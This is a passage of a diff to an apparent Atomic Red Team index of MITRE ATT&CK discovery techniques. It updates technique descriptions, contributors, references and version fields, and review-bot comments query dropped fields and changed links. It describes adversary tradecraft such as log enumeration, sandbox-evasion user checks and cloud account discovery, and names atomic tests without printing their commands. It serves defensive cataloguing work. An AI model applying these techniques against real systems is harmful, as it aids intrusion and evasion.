+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
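Review bot: The Deloitte Environment Awareness reference changes from `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same id with `/edit` appended, with the retrieval date moved to September 13, 2024. A Drive `/edit` link is not guaranteed to resolve for an anonymous reader the way the plain `/file/d/<id>` form does, so confirm the new URL opens without sign-in before accepting it; the identical change is repeated for T1497.002 later in this patch.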
@@ -61374,7 +62062,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -61392,12 +62080,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -61405,11 +62092,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
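Review bot: The new paragraph in the T1654 description cites `(Citation: Permiso GUI-Vil 2023)`, and the matching `external_references` entry (`+ - source_name: Permiso GUI-Vil 2023`) is added two hunks down together with the `'1.0'` -> `'1.1'` version bump, so the citation resolves. `x_mitre_detection: ''` stays empty for this technique, so the index still carries no detection guidance for the newly described behaviour of watching logs in real time to track incident response; that is upstream ATT&CK content rather than something to patch in this file.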
@@ -61420,7 +62110,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -61434,6 +62124,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -61453,56 +62147,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -61524,19 +62173,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
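Review bot: `- x_mitre_permissions_required:` / `- - User` is removed from T1087.004 in this hunk and never re-added in the rebuilt block, so unlike the other keys, which are only reordered, this attribute is dropped outright; T1614.001 later in the patch keeps `x_mitre_permissions_required: - User`, so the two techniques are now inconsistent. Confirm the drop is intended. Separately, the carried-over `source_name: Google Cloud - IAM Servie Accounts List API` keeps the upstream typo; it has to stay spelled that way as long as the description cites it by that key, so it is not something to fix here.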
@@ -61607,7 +62298,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
@@ -61634,41 +62324,7 @@ discovery:
name: sh
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -61692,6 +62348,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -61702,9 +62361,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -61714,12 +62378,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -61762,7 +62453,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests:
- name: Permission Groups Discovery (Local)
@@ -61784,7 +62474,7 @@ discovery:
name: sh
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -61795,28 +62485,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -61849,9 +62542,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
@@ -61978,7 +62670,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -62017,8 +62709,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests:
- name: Discover System Language with locale
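Review bot: For T1614.001 this hunk deletes both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` with no `+` replacement, whereas every other technique in this patch keeps `x_mitre_attack_spec_version` or bumps it to 3.2.0 (as T1201 does with `+ x_mitre_attack_spec_version: 3.2.0`). Together with the modified date regressing to `'2021-10-15T22:00:56.174Z'` in the previous hunk, this looks like the T1614.001 object was sourced from an older bundle than its siblings; confirm that rather than shipping a technique with no spec version at all.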
@@ -62106,7 +62796,7 @@ discovery:
name: sh
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -62147,87 +62837,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests:
- name: Get geolocation info through IP-Lookup services using curl freebsd, linux
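Review bot: the `-` lines at the end of this hunk delete x_mitre_data_sources ('Process: Process Creation', 'Process: OS API Execution', 'Command: Command Execution'), x_mitre_permissions_required and x_mitre_is_subtechnique for T1614, and earlier in the same hunk delete modified, name, description, kill_chain_phases, x_mitre_detection and x_mitre_version, with no `+` lines restoring any of them in the visible portion; confirm they are re-added elsewhere in the T1614 object, otherwise the detection data sources and the technique text are lost. The visible additions are a key reorder of external_references (url now follows description, external_id now follows url), `revoked: false`, the FBI Ragnar Locker URL moving from assets.documentcloud.org to s3.documentcloud.org with its retrieved date bumped to September 12, 2024, and x_mitre_attack_spec_version 2.1.0 to 3.2.0. Leave the misspelled source_name 'Securelist Trasparent Tribe 2020' as-is: the description cites that exact key, so correcting it here would break the citation.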
@@ -62302,7 +62990,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests:
- name: Security Software Discovery - ps (Linux)
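Review bot: `spec_version: '2.1'` is dropped here and in almost every other hunk of this file. If anything downstream reads that STIX 2.1 field, make sure the removal is a deliberate generator change rather than a regression, and state it in the commit message so consumers know to stop expecting the key.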
@@ -62331,12 +63018,12 @@ discovery:
name: sh
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
